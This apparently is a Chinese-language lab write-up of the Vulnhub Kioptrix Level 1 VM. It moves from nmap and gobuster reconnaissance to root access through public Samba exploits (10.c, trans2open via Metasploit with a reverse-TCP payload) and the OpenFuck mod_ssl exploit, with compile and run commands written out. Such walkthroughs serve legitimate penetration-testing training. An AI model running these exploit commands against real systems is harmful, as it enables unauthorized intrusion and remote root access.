Vulnhub Kioptrix-Level-1

ivi

Toxic80l 狐狸说安全 2024-03-05 11:15 山东

0x01 靶机介绍

• Name: Kioptrix: Level 1 (#1)
• Date release: 17 Feb 2010
• Author: Kioptrix
• Series: Kioptrix
• Web page: http://www.kioptrix.com/blog/?page_id=135
  
  

靶机下载地址：

• 
  

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
0x02 侦察

端口探测

首先使用 nmap 进行端口扫描

• 
  

nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_kioptrix-1

扫描结果显示目标开放了22、80、111、139、443和1024端口

80端口

访问http://192.168.0.106为测试界面

目录扫描

使用 gobuster 进行目录扫描，成功发现目录manual、usage、mrtg

1. gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

复制代码

访问manual目录存在目录遍历


访问usage目录为网站的使用情况


访问mrtg目录为 MRTG 且版本为2.9.6

0x03 上线[root]

信息收集

使用 MSF 扫描 Samba 版本为2.2.1a

• 
  

msfconsolemsf > use auxiliary/scanner/smb/smb_versionmsf > set RHOSTS 192.168.0.106msf > run


使用 searchsploit 查找相关漏洞，成功发现存在多个远程代码执行漏洞

1. searchsploit samba 2.2
   
2. cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./

复制代码

Samba远程代码执行

编译并执行 EXP，成功拿到 root 用户权限

1. gcc 10.c -o exp
   
2. ./exp -b 0 -v 192.168.0.106

复制代码

Samba trans2open远程溢出MSF利用

使用 MSF 进行漏洞利用，成功拿到root权限

1. msfconsole
   
2. msf > use exploit/linux/samba/trans2open
   
3. msf > set rhosts 192.168.0.106
   
4. msf > set lhost 192.168.0.109
   
5. msf > set payload linux/x86/shell/reverse_tcp
   
6. msf > run

复制代码

编译执行

复制 EXP 至本地目录

1. searchsploit trans2open
   
2. cp /usr/share/exploitdb/exploits/unix/remote/22469.c ./

复制代码

编译并执行 EXP，成功拿到 root 用户权限

1. gcc 22469.c -o exp1
   
2. ./exp1 -t 192.168.0.106

复制代码

Apache mod_ssl 远程溢出

进入http://192.168.0.106/manual/mod/mod_ssl/发现mod_ssl的版本为2.8

使用 OpenFuck 前提需安装libssl-dev库

1. git clone https://github.com/heltonWernik/OpenFuck.git
   
2. apt-get install libssl-dev

复制代码

编译 OpenFuck 并运行，提示不同系统所支持的偏移量

1. gcc -o OpenFuck OpenFuck.c -lcrypto
   
2. ./OpenFuck

复制代码

靶机的 Apache 版本为1.3.20，操作系统为 RedHat，因此偏移量可使用0x6a和0x6b

1. ./OpenFuck 0x6a 192.168.0.106 -c 40
   
2. ./OpenFuck 0x6b 192.168.0.106 -c 50

复制代码